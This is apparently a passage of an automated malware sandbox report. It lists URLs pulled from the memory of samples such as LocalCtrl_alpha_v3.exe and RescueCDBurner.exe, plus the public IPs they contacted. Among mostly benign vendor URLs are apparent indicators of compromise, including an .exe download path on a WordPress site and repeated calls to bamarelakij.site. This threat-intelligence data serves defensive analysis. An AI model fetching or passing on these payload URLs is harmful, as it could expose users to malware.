http://www.reneelab.ru/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://b.chenall.net/menu.lst	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.softwareok.de	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.clarity.ms	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://grub4dos.chenall.net/e/%u)	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/waffle-wc.5e95a6e8b96055fbd144.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.es/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://msn.com	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW	LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000067A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2339606429.000000000065F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://ent-api.msn.com/%22	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	RescueCDBurner.exe, 00000003.00000002.1371930733.000000006C5F9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1352020687.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	false		high
https://avrupabaski.com/wp-content/upgrade/wsn.exe	LocalCtrl_alpha_v3.exe, 00000009.00000003.2056380672.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2056696968.0000000002E3F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2659623429.0000000002E25000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/bundles/v1/edgeChromium/latest/MarketMismatchCoachMark.299d15b5c8b6a1a89031.j	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.kr/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.jp/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.winimage.com/zLibDll1.2.6	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.net/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://qt.digia.com/product/licensing	RescueCDBurner.exe, 00000004.00000002.1434547488.000000006BAEE000.00000002.00000001.01000000.00000014.sdmp	false		high
http://trolltech.com/xml/features/report-start-end-entityUnknown	RescueCDBurner.exe, 00000003.00000002.1371930733.000000006C5F9000.00000002.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000003.1352020687.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	false		high
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.symauth.com/cps0(	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.078daa21cfb37d404ae1.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://ntp.msn.	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bzib.nelreports.net/api/report?cat=bingbusiness	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.6705de96e957a57fb475.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.info-zip.org/	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009A5C000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000004FEA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.htmlm	LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://trolltech.com/xml/features/report-start-end-entity	RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://downloads.reneelab.com.cn/passnow/passnow_	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://appsyndication.org/2006/appsyn	24EPV9vjc5.exe	false		high
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://support.reneelab.com/anonymous_requests/new	RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.fr/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://downloads.reneelab.com.cn/download_api.php	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.94c0190808bd5252056f.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/	LocalCtrl_alpha_v3.exe, 00000009.00000003.2339940175.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.html	LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.cc/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.de/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://x1.c.lencr.org/0	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHE	LocalCtrl_alpha_v3.exe, 00000009.00000003.2452154985.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2657389325.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2339606429.000000000065F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://isecure-a.reneelab.com/webapi.php?code=	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0D	RescueCDBurner.exe, 00000003.00000002.1372101532.000000006C6C9000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	false		high
https://bamarelakij.site:443	LocalCtrl_alpha_v3.exe, 00000009.00000003.2065326779.000000000067A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo	RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://www.reneelab.com	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://ntp.msn.com/	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288301207.00000000080BC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2438767796.0000000002E7E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://bugreports.qt-project.org/	RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433533431.000000006B4E9000.00000002.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reneelab.com.cn/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://www.reneelab.pl/	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300257481.00000000080BC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.reneelab.comwww.reneelab.comhttp://https://0	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
http://xml.org/sax/features/namespaces	RescueCDBurner.exe, RescueCDBurner.exe, 00000004.00000002.1433239437.000000006B419000.00000002.00000001.01000000.00000015.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.13e1b09423b11e6198b5.js	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://isecure.reneelab.com.cn/webapi.php?code=	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1352328069.000000000A823000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/bundles/v1/edgeChromium/latest/nurturing-placement-manager.52a7b8467c1cb4d144	LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high
https://downloads.reneelab.com/passnow/passnow_	RescueCDBurner.exe, 00000003.00000000.1339692384.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1356442812.0000000000854000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1355407575.0000000000934000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	false		high
https://assets.msn.com/config/v1/&os=windows&locale=	LocalCtrl_alpha_v3.exe, 00000009.00000003.2300620973.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2288219961.0000000002EE5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor	24EPV9vjc5.exe, 00000000.00000000.1315066949.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmp, 24EPV9vjc5.exe, 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmp, 24EPV9vjc5.exe, 00000002.00000000.1321845292.000000000069B000.00000002.00000001.01000000.00000005.sdmp	false		high
http://www.???.xx/?search=%s	RescueCDBurner.exe, 00000003.00000002.1370083717.0000000009AB2000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1430634708.0000000009D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.219.82.16	unknown	United States	20940	AKAMAI-ASN1EU	false
131.253.33.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.126.116.58	unknown	United States	20940	AKAMAI-ASN1EU	false
52.182.143.215	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
108.139.47.33	unknown	United States	16509	AMAZON-02US	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
